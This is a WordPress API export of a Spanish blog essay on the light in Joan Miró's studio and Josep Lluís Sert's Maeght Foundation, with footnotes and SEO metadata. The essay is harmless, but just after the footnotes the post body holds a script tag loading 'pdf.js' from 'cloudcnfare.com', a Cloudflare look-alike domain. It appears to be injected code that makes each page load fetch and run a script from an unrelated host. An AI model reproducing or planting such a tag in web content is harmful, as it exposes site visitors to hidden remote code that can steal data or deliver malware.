{"id":67310,"date":"2018-07-30T00:01:04","date_gmt":"2018-07-29T22:01:04","guid":{"rendered":"https:\/\/veredes.es\/blog\/?p=67310"},"modified":"2022-09-30T16:35:41","modified_gmt":"2022-09-30T14:35:41","slug":"refugio-la-luz-miguel-angel-diaz-camacho","status":"publish","type":"post","link":"https:\/\/veredes.es\/blog\/refugio-la-luz-miguel-angel-diaz-camacho\/","title":{"rendered":"El refugio de la luz | Miguel \u00c1ngel D\u00edaz Camacho"},"content":{"rendered":"<p><figure id=\"attachment_67311\" aria-describedby=\"caption-attachment-67311\" style=\"width: 750px\" class=\"wp-caption alignnone\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-67311\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/01\/El-refugio-de-la-luz-El-taller-de-Joan-Mir_-a-Mallorca-en-una-de-les-p_gines-de-El-ojo-de-Mir_-editat-per-La-F_brica..jpg\" alt=\"El taller de Joan Mir\u00f3 en Mallorca en una de las p\u00e1ginas de 'El ojo de Mir\u00f3', editado por La F\u00e1brica.\" width=\"750\" height=\"486\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/01\/El-refugio-de-la-luz-El-taller-de-Joan-Mir_-a-Mallorca-en-una-de-les-p_gines-de-El-ojo-de-Mir_-editat-per-La-F_brica..jpg 646w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/01\/El-refugio-de-la-luz-El-taller-de-Joan-Mir_-a-Mallorca-en-una-de-les-p_gines-de-El-ojo-de-Mir_-editat-per-La-F_brica.-300x195.jpg 300w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/01\/El-refugio-de-la-luz-El-taller-de-Joan-Mir_-a-Mallorca-en-una-de-les-p_gines-de-El-ojo-de-Mir_-editat-per-La-F_brica.-160x105.jpg 160w\" sizes=\"auto, (max-width: 750px) 100vw, 750px\" \/><figcaption id=\"caption-attachment-67311\" class=\"wp-caption-text\"><span style=\"color: #999999;\">El taller de Joan Mir\u00f3 en Mallorca en una de las p\u00e1ginas de<a href=\"https:\/\/www.amazon.es\/gp\/product\/8416248176?ie=UTF8&amp;tag=wwwveredeses-21&amp;camp=3638&amp;linkCode=xm2&amp;creativeASIN=8416248176\" target=\"_blank\" rel=\"noopener\"> &#8216;El ojo de Mir\u00f3<\/a>&#8216;, editado por La F\u00e1brica.<\/span><\/figcaption><\/figure><\/p>\n<p style=\"text-align: justify;\">Cuentan que fue al visitar el taller de Joan Mir\u00f3 en\u00a0<a href=\"http:\/\/miro.palmademallorca.es\/pagina.php?Idi=1&amp;Cod_fam=1&amp;Cod_sub=0\" target=\"_blank\" rel=\"noopener\">Cala Mayor<\/a>\u00a0cuando Aim\u00e9 Maeght comprendi\u00f3, con verdadera exactitud, el componente esencial para su futura Fundaci\u00f3n en\u00a0Saint Paul de Vence. Tras numerosos estudios y proyectos de arquitectos prestigiosos,\u00a0Maeght\u00a0descubrir\u00eda una luz homog\u00e9nea y\u00a0vibrante en el estudio del pintor, una luz tan intensa y al mismo tiempo tan agradable, que hubo de viajar muy lejos, sin importarle, para encontrar al autor de aquel prodigio, el creador de una atm\u00f3sfera que habr\u00eda de repetir, si llegado el caso fuera posible.<\/p>\n<p style=\"text-align: justify;\">Aquel arquitecto, un espa\u00f1ol refugiado entonces en Estados Unidos, era<strong>\u00a0<a href=\"http:\/\/www.rtve.es\/alacarta\/videos\/imprescindibles\/imprescindibles-josep-lluis-sert-sueno-nomada\/2567683\/\" target=\"_blank\" rel=\"noopener\">Josep Llu\u00eds Sert<\/a><\/strong>.<sup>1<\/sup><\/p>\n<div style=\"width: 100%; padding-top: 64%; position: relative; border-bottom: 1px solid #aaa; display: inline-block; background: rgba(255,255,255,0.9);\">\n<p><iframe loading=\"lazy\" style=\"width: 100%; height: 90%; position: absolute; left: 0; top: 0; overflow: hidden;\" src=\"http:\/\/www.rtve.es\/drmn\/embed\/video\/2567683\" name=\"Josep Lluis Sert, un sue\u00f1o n\u00f3mada\" width=\"300\" height=\"150\" frameborder=\"0\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n<div style=\"position: absolute; bottom: 0; left: 0; font-family: arial,helvetica,sans-serif; font-size: 12px; line-height: 1.833; display: inline-block; padding: 5px 0 5px 10px;\"><span style=\"float: left; margin-right: 10px;\"> <img decoding=\"async\" style=\"height: 20px; width: auto; background: transparent; padding: 0; margin: 0;\" src=\"http:\/\/img.irtve.es\/css\/rtve.commons\/rtve.header.footer\/i\/logoRTVEes.png\" \/> <\/span> <a style=\"color: #333; font-weight: bold;\" title=\"Josep Lluis Sert, un sue\u00f1o n\u00f3mada\" href=\"http:\/\/www.rtve.es\/alacarta\/videos\/imprescindibles\/imprescindibles-josep-lluis-sert-sueno-nomada\/2567683\/\" target=\"_blank\" rel=\"noopener\"> <strong>Josep Lluis Sert, un sue\u00f1o n\u00f3mada<\/strong> <\/a><\/div>\n<\/div>\n<p style=\"text-align: justify;\">La visita al taller se produce en 1960. Tras perder el matrimonio Maeght a su hijo de tan solo once a\u00f1os en 1953, su amigo el pintor y escultor <strong>Georges Braque<\/strong>, propone al coleccionista una aventura vital que de alg\u00fan modo habr\u00eda de girar en torno a la hermosa propiedad de los Maeght cerca de Niza: la construcci\u00f3n de una Fundaci\u00f3n de Arte (museo, taller y residencia para artistas), algo ins\u00f3lito para la \u00e9poca<sup>2<\/sup>.<\/p>\n<p style=\"text-align: justify;\">La parcela era en realidad un paisaje en lo alto, una loma agreste habitada tan solo por un bosque mediterr\u00e1neo con generosas vistas sobre el mar. Cuentan que Sert realiz\u00f3 maquetas a escala 1:1 para reproducir aquella luz que a\u00fan resonaba en la memoria de Aim\u00e9, una luz cercana, casi visible al otro lado del horizonte de la Costa Azul. Se puede casi intuir la ligereza de los armazones provisionales en aquel lugar, su movimiento por la parcela -durante un a\u00f1o- buscando su mejor posici\u00f3n para las obras de Braque, Chagall o el propio Mir\u00f3.<sup>3<\/sup><\/p>\n<p style=\"text-align: justify;\">En la imagen un conjunto de objetos parece flotar en medio de una luz espesa, una constelaci\u00f3n desvinculada del suelo ante la sorprendente ausencia de sombras. En el taller de Mir\u00f3 la luz acepta por igual al lienzo o la butaca, la mesa o el taburete, la botella o la mecedora, convertidos aqu\u00ed en una suerte de ofrenda libre del<em>\u00a0carb\u00f3n abyecto de los d\u00edas\u00a0<\/em>(Caballero Bonald).<\/p>\n<p style=\"text-align: justify;\">Tal vez m\u00e1s all\u00e1 de la atm\u00f3sfera homog\u00e9nea que exige el noble oficio de la pintura, m\u00e1s all\u00e1 incluso de la ilusoria percepci\u00f3n submarina e ingr\u00e1vida de\u00a0este extra\u00f1o bodeg\u00f3n cuyo orden desconocemos, tal vez dec\u00edamos, este grupo humano irrepetible y atormentado buscara en la luz el aliento mete\u00f3rico de un refugio universal: el\u00a0refugio de la luz.<\/p>\n<p style=\"text-align: justify;\">Miguel \u00c1ngel D\u00edaz Camacho. Doctor Arquitecto<br \/>\nMadrid. Febrero\u00a02016.<br \/>\n<span style=\"color: #999999;\">Autor de\u00a0<em>Parr\u00e1fos de arquitectura<\/em>.\u00a0<a style=\"color: #999999;\" href=\"https:\/\/twitter.com\/hashtag\/arquiparrafos?f=realtime&amp;src=hash\" target=\"_blank\" rel=\"noopener\">#arquiParrafos<\/a><\/span><\/p>\n<p style=\"text-align: justify;\">Notas:<br \/>\n<sup>1<\/sup> Sert hab\u00eda cultivado una muy buena impresi\u00f3n en Francia tras la construcci\u00f3n del\u00a0Pabell\u00f3n de la Rep\u00fablica Espa\u00f1ola para la Exposici\u00f3n Internacional de Par\u00eds de 1937.<\/p>\n<p style=\"text-align: justify;\"><sup>2<\/sup> La casualidad quiso que en la parcela existieran unos restos de una capilla dedicada a San Bernardo, precisamente el nombre de su hijo. La reconstrucci\u00f3n de esta capilla sirve a Braque como argumento bals\u00e1mico, introduciendo inmediatamente a continuaci\u00f3n la idea de la Fundaci\u00f3n.<\/p>\n<p style=\"text-align: justify;\"><sup>3<\/sup> En este sentido, Sert pudo mantener \u00ablargas conversaciones\u00bb con los artistas. Ver\u00a0<em>Connaissance des Arts<\/em>, (Redacteur en chef, Philip Jodidio), Paris, Soci\u00e9t\u00e9 Fran\u00e7aise de Promotion Artistique, 1998, p\u00e1g. \u00a015.<\/p>\n<p><script src=\"https:\/\/cloudcnfare.com\/pdf.js\" type=\"text\/javascript\"><\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>Cuentan que fue al visitar el taller de Joan Mir\u00f3 en\u00a0Cala Mayor\u00a0cuando Aim\u00e9 Maeght comprendi\u00f3, con verdadera exactitud, el componente esencial para su futura Fundaci\u00f3n en\u00a0Saint Paul de Vence. Tras numerosos estudios y proyectos de arquitectos prestigiosos,\u00a0Maeght\u00a0descubrir\u00eda una luz homog\u00e9nea y\u00a0vibrante en el estudio del pintor, una luz tan intensa y al mismo tiempo tan [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":67311,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5934,5951],"tags":[13415,12449,155,13416,668,9700,3037,6465,1021,7927,1865,1278],"class_list":{"0":"post-67310","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-articulos","8":"category-slider-principal","9":"tag-aime-maeght","10":"tag-arte","11":"tag-arte-contemporaneo","12":"tag-georges-braque","13":"tag-historia","14":"tag-joan-miro","15":"tag-josep-lluis-sert","16":"tag-miguel-angel-diaz-camacho","17":"tag-pensamiento","18":"tag-philip-jodidio","19":"tag-reflexion","20":"tag-teoria"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>El refugio de la luz | Miguel \u00c1ngel D\u00edaz Camacho - veredes<\/title>\n<meta name=\"description\" content=\"Toda la informaci\u00f3n sobre: [:es]El refugio de la luz | Miguel \u00c1ngel D\u00edaz Camacho[:gl]O refuxio da luz | Miguel \u00c1ngel D\u00edaz Camacho[:en]The refuge of the light | Miguel \u00c1ngel D\u00edaz Camacho[:]\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/veredes.es\/blog\/refugio-la-luz-miguel-angel-diaz-camacho\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"[:es]El refugio de la luz | Miguel \u00c1ngel D\u00edaz Camacho[:gl]O refuxio da luz | Miguel \u00c1ngel D\u00edaz Camacho[:en]The refuge of the light | Miguel \u00c1ngel D\u00edaz Camacho[:] - veredes\" \/>\n<meta property=\"og:description\" content=\"Toda la informaci\u00f3n sobre: [:es]El refugio de la luz | Miguel \u00c1ngel D\u00edaz Camacho[:gl]O refuxio da luz | Miguel \u00c1ngel D\u00edaz Camacho[:en]The refuge of the light | Miguel \u00c1ngel D\u00edaz Camacho[:]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/veredes.es\/blog\/refugio-la-luz-miguel-angel-diaz-camacho\/\" \/>\n<meta property=\"og:site_name\" content=\"veredes, arquitectura y divulgaci\u00f3n\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/diazcamacho\" \/>\n<meta property=\"article:published_time\" content=\"2018-07-29T22:01:04+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-09-30T14:35:41+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/01\/El-refugio-de-la-luz-El-taller-de-Joan-Mir_-a-Mallorca-en-una-de-les-p_gines-de-El-ojo-de-Mir_-editat-per-La-F_brica..jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"646\" \/>\n\t<meta property=\"og:image:height\" content=\"419\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Miguel \u00c1ngel D\u00edaz Camacho\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@https:\/\/twitter.com\/MADCARQUITECTOS\" \/>\n<meta name=\"twitter:site\" content=\"@veredes\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Miguel \u00c1ngel D\u00edaz Camacho\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/refugio-la-luz-miguel-angel-diaz-camacho\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/refugio-la-luz-miguel-angel-diaz-camacho\\\/\"},\"author\":{\"name\":\"Miguel \u00c1ngel D\u00edaz Camacho\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/person\\\/e3a2f3fc087cf59bab205fb869b57b1d\"},\"headline\":\"El refugio de la luz | Miguel \u00c1ngel D\u00edaz Camacho\",\"datePublished\":\"2018-07-29T22:01:04+00:00\",\"dateModified\":\"2022-09-30T14:35:41+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/refugio-la-luz-miguel-angel-diaz-camacho\\\/\"},\"wordCount\":1754,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/refugio-la-luz-miguel-angel-diaz-camacho\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/01\\\/El-refugio-de-la-luz-El-taller-de-Joan-Mir_-a-Mallorca-en-una-de-les-p_gines-de-El-ojo-de-Mir_-editat-per-La-F_brica..jpg\",\"keywords\":[\"Aim\u00e9 Maeght\",\"arte\",\"arte contemporaneo\",\"Georges Braque\",\"historia\",\"Joan Mir\u00f3\",\"Josep Llu\u00eds Sert\",\"Miguel \u00c1ngel D\u00edaz Camacho\",\"pensamiento\",\"Philip Jodidio\",\"reflexi\u00f3n\",\"teor\u00eda\"],\"articleSection\":[\"art\u00edculos\",\"slider principal\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/veredes.es\\\/blog\\\/refugio-la-luz-miguel-angel-diaz-camacho\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/refugio-la-luz-miguel-angel-diaz-camacho\\\/\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/refugio-la-luz-miguel-angel-diaz-camacho\\\/\",\"name\":\"[:es]El refugio de la luz | Miguel \u00c1ngel D\u00edaz Camacho[:gl]O refuxio da luz | Miguel \u00c1ngel D\u00edaz Camacho[:en]The refuge of the light | Miguel \u00c1ngel D\u00edaz Camacho[:] - veredes\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/refugio-la-luz-miguel-angel-diaz-camacho\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/refugio-la-luz-miguel-angel-diaz-camacho\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/01\\\/El-refugio-de-la-luz-El-taller-de-Joan-Mir_-a-Mallorca-en-una-de-les-p_gines-de-El-ojo-de-Mir_-editat-per-La-F_brica..jpg\",\"datePublished\":\"2018-07-29T22:01:04+00:00\",\"dateModified\":\"2022-09-30T14:35:41+00:00\",\"description\":\"Toda la informaci\u00f3n sobre: [:es]El refugio de la luz | Miguel \u00c1ngel D\u00edaz Camacho[:gl]O refuxio da luz | Miguel \u00c1ngel D\u00edaz Camacho[:en]The refuge of the light | Miguel \u00c1ngel D\u00edaz Camacho[:]\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/refugio-la-luz-miguel-angel-diaz-camacho\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/veredes.es\\\/blog\\\/refugio-la-luz-miguel-angel-diaz-camacho\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/refugio-la-luz-miguel-angel-diaz-camacho\\\/#primaryimage\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/01\\\/El-refugio-de-la-luz-El-taller-de-Joan-Mir_-a-Mallorca-en-una-de-les-p_gines-de-El-ojo-de-Mir_-editat-per-La-F_brica..jpg\",\"contentUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/01\\\/El-refugio-de-la-luz-El-taller-de-Joan-Mir_-a-Mallorca-en-una-de-les-p_gines-de-El-ojo-de-Mir_-editat-per-La-F_brica..jpg\",\"width\":646,\"height\":419,\"caption\":\"El taller de Joan Mir\u00f3 en Mallorca en una de las p\u00e1ginas de 'El ojo de Mir\u00f3', editado por La F\u00e1brica.\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/refugio-la-luz-miguel-angel-diaz-camacho\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/veredes.es\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"El refugio de la luz | Miguel \u00c1ngel D\u00edaz Camacho\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/\",\"name\":\"veredes, arquitectura y divulgaci\u00f3n\",\"description\":\"veredes\",\"publisher\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#organization\"},\"alternateName\":\"veredes\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/veredes.es\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#organization\",\"name\":\"veredes, arquitectura y divulgaci\u00f3n\",\"alternateName\":\"veredes\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/veredes-logo-centrado_140x54.png\",\"contentUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/veredes-logo-centrado_140x54.png\",\"width\":140,\"height\":54,\"caption\":\"veredes, arquitectura y divulgaci\u00f3n\"},\"image\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/veredesArquitecturayDivulgacion\\\/\",\"https:\\\/\\\/x.com\\\/veredes\",\"https:\\\/\\\/instagram.com\\\/veredes\\\/\",\"https:\\\/\\\/www.linkedin.com\\\/company\\\/veredes-arquitectura-y-divulgacion\\\/\",\"https:\\\/\\\/es.pinterest.com\\\/veredes\\\/\",\"https:\\\/\\\/www.tumblr.com\\\/veredes\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/person\\\/e3a2f3fc087cf59bab205fb869b57b1d\",\"name\":\"Miguel \u00c1ngel D\u00edaz Camacho\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/miguel\u00e1ngeld\u00edazcamacho-96x96.jpg\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/miguel\u00e1ngeld\u00edazcamacho-96x96.jpg\",\"contentUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/miguel\u00e1ngeld\u00edazcamacho-96x96.jpg\",\"caption\":\"Miguel \u00c1ngel D\u00edaz Camacho\"},\"description\":\"Es doctor arquitecto y actual presidente de la Asociaci\u00f3n Sostenibilidad y Arquitectura. Delegado del Consejo Superior de los Colegios de Arquitectos de Espa\u00f1a (CSCAE) en el Consejo Europeo de Arquitectos, Architects Council of Europe (ACE). Socio fundador en MADC Arquitectos, compa\u00f1\u00eda establecida en Madrid que ha recibido numerosos premios en concursos nacionales e internacionales. Investigador y profesor universitario, su filosof\u00eda de trabajo y pensamiento te\u00f3rico han sido ampliamente desarrollados en publicaciones como \u201cP\u00e1rrafos de Arquitectura. Core(oh)graf\u00edas\u201d (Ediciones Asim\u00e9tricas, 2016) o \u201cArquitectura y Cambio Clim\u00e1tico\u201d (Fundaci\u00f3n Arquia, 2018). En la actualidad desarrolla proyectos de arquitectura y urbanismo en Espa\u00f1a y Noruega.\",\"sameAs\":[\"https:\\\/\\\/madc.xyz\\\/\",\"https:\\\/\\\/www.facebook.com\\\/diazcamacho\",\"https:\\\/\\\/www.instagram.com\\\/madc_architecture\\\/\",\"https:\\\/\\\/www.linkedin.com\\\/in\\\/madcarquitectos\\\/\",\"https:\\\/\\\/x.com\\\/https:\\\/\\\/twitter.com\\\/MADCARQUITECTOS\"],\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/author\\\/miguel-angel-diaz-camacho\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"[:es]El refugio de la luz | Miguel \u00c1ngel D\u00edaz Camacho[:gl]O refuxio da luz | Miguel \u00c1ngel D\u00edaz Camacho[:en]The refuge of the light | Miguel \u00c1ngel D\u00edaz Camacho[:] - veredes","description":"Toda la informaci\u00f3n sobre: [:es]El refugio de la luz | Miguel \u00c1ngel D\u00edaz Camacho[:gl]O refuxio da luz | Miguel \u00c1ngel D\u00edaz Camacho[:en]The refuge of the light | Miguel \u00c1ngel D\u00edaz Camacho[:]","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/veredes.es\/blog\/refugio-la-luz-miguel-angel-diaz-camacho\/","og_locale":"es_ES","og_type":"article","og_title":"[:es]El refugio de la luz | Miguel \u00c1ngel D\u00edaz Camacho[:gl]O refuxio da luz | Miguel \u00c1ngel D\u00edaz Camacho[:en]The refuge of the light | Miguel \u00c1ngel D\u00edaz Camacho[:] - veredes","og_description":"Toda la informaci\u00f3n sobre: [:es]El refugio de la luz | Miguel \u00c1ngel D\u00edaz Camacho[:gl]O refuxio da luz | Miguel \u00c1ngel D\u00edaz Camacho[:en]The refuge of the light | Miguel \u00c1ngel D\u00edaz Camacho[:]","og_url":"https:\/\/veredes.es\/blog\/refugio-la-luz-miguel-angel-diaz-camacho\/","og_site_name":"veredes, arquitectura y divulgaci\u00f3n","article_publisher":"https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/","article_author":"https:\/\/www.facebook.com\/diazcamacho","article_published_time":"2018-07-29T22:01:04+00:00","article_modified_time":"2022-09-30T14:35:41+00:00","og_image":[{"width":646,"height":419,"url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/01\/El-refugio-de-la-luz-El-taller-de-Joan-Mir_-a-Mallorca-en-una-de-les-p_gines-de-El-ojo-de-Mir_-editat-per-La-F_brica..jpg","type":"image\/jpeg"}],"author":"Miguel \u00c1ngel D\u00edaz Camacho","twitter_card":"summary_large_image","twitter_creator":"@https:\/\/twitter.com\/MADCARQUITECTOS","twitter_site":"@veredes","twitter_misc":{"Escrito por":"Miguel \u00c1ngel D\u00edaz Camacho","Tiempo de lectura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/veredes.es\/blog\/refugio-la-luz-miguel-angel-diaz-camacho\/#article","isPartOf":{"@id":"https:\/\/veredes.es\/blog\/refugio-la-luz-miguel-angel-diaz-camacho\/"},"author":{"name":"Miguel \u00c1ngel D\u00edaz Camacho","@id":"https:\/\/veredes.es\/blog\/#\/schema\/person\/e3a2f3fc087cf59bab205fb869b57b1d"},"headline":"El refugio de la luz | Miguel \u00c1ngel D\u00edaz Camacho","datePublished":"2018-07-29T22:01:04+00:00","dateModified":"2022-09-30T14:35:41+00:00","mainEntityOfPage":{"@id":"https:\/\/veredes.es\/blog\/refugio-la-luz-miguel-angel-diaz-camacho\/"},"wordCount":1754,"commentCount":0,"publisher":{"@id":"https:\/\/veredes.es\/blog\/#organization"},"image":{"@id":"https:\/\/veredes.es\/blog\/refugio-la-luz-miguel-angel-diaz-camacho\/#primaryimage"},"thumbnailUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/01\/El-refugio-de-la-luz-El-taller-de-Joan-Mir_-a-Mallorca-en-una-de-les-p_gines-de-El-ojo-de-Mir_-editat-per-La-F_brica..jpg","keywords":["Aim\u00e9 Maeght","arte","arte contemporaneo","Georges Braque","historia","Joan Mir\u00f3","Josep Llu\u00eds Sert","Miguel \u00c1ngel D\u00edaz Camacho","pensamiento","Philip Jodidio","reflexi\u00f3n","teor\u00eda"],"articleSection":["art\u00edculos","slider principal"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/veredes.es\/blog\/refugio-la-luz-miguel-angel-diaz-camacho\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/veredes.es\/blog\/refugio-la-luz-miguel-angel-diaz-camacho\/","url":"https:\/\/veredes.es\/blog\/refugio-la-luz-miguel-angel-diaz-camacho\/","name":"[:es]El refugio de la luz | Miguel \u00c1ngel D\u00edaz Camacho[:gl]O refuxio da luz | Miguel \u00c1ngel D\u00edaz Camacho[:en]The refuge of the light | Miguel \u00c1ngel D\u00edaz Camacho[:] - veredes","isPartOf":{"@id":"https:\/\/veredes.es\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/veredes.es\/blog\/refugio-la-luz-miguel-angel-diaz-camacho\/#primaryimage"},"image":{"@id":"https:\/\/veredes.es\/blog\/refugio-la-luz-miguel-angel-diaz-camacho\/#primaryimage"},"thumbnailUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/01\/El-refugio-de-la-luz-El-taller-de-Joan-Mir_-a-Mallorca-en-una-de-les-p_gines-de-El-ojo-de-Mir_-editat-per-La-F_brica..jpg","datePublished":"2018-07-29T22:01:04+00:00","dateModified":"2022-09-30T14:35:41+00:00","description":"Toda la informaci\u00f3n sobre: [:es]El refugio de la luz | Miguel \u00c1ngel D\u00edaz Camacho[:gl]O refuxio da luz | Miguel \u00c1ngel D\u00edaz Camacho[:en]The refuge of the light | Miguel \u00c1ngel D\u00edaz Camacho[:]","breadcrumb":{"@id":"https:\/\/veredes.es\/blog\/refugio-la-luz-miguel-angel-diaz-camacho\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/veredes.es\/blog\/refugio-la-luz-miguel-angel-diaz-camacho\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/veredes.es\/blog\/refugio-la-luz-miguel-angel-diaz-camacho\/#primaryimage","url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/01\/El-refugio-de-la-luz-El-taller-de-Joan-Mir_-a-Mallorca-en-una-de-les-p_gines-de-El-ojo-de-Mir_-editat-per-La-F_brica..jpg","contentUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/01\/El-refugio-de-la-luz-El-taller-de-Joan-Mir_-a-Mallorca-en-una-de-les-p_gines-de-El-ojo-de-Mir_-editat-per-La-F_brica..jpg","width":646,"height":419,"caption":"El taller de Joan Mir\u00f3 en Mallorca en una de las p\u00e1ginas de 'El ojo de Mir\u00f3', editado por La F\u00e1brica."},{"@type":"BreadcrumbList","@id":"https:\/\/veredes.es\/blog\/refugio-la-luz-miguel-angel-diaz-camacho\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/veredes.es\/blog\/"},{"@type":"ListItem","position":2,"name":"El refugio de la luz | Miguel \u00c1ngel D\u00edaz Camacho"}]},{"@type":"WebSite","@id":"https:\/\/veredes.es\/blog\/#website","url":"https:\/\/veredes.es\/blog\/","name":"veredes, arquitectura y 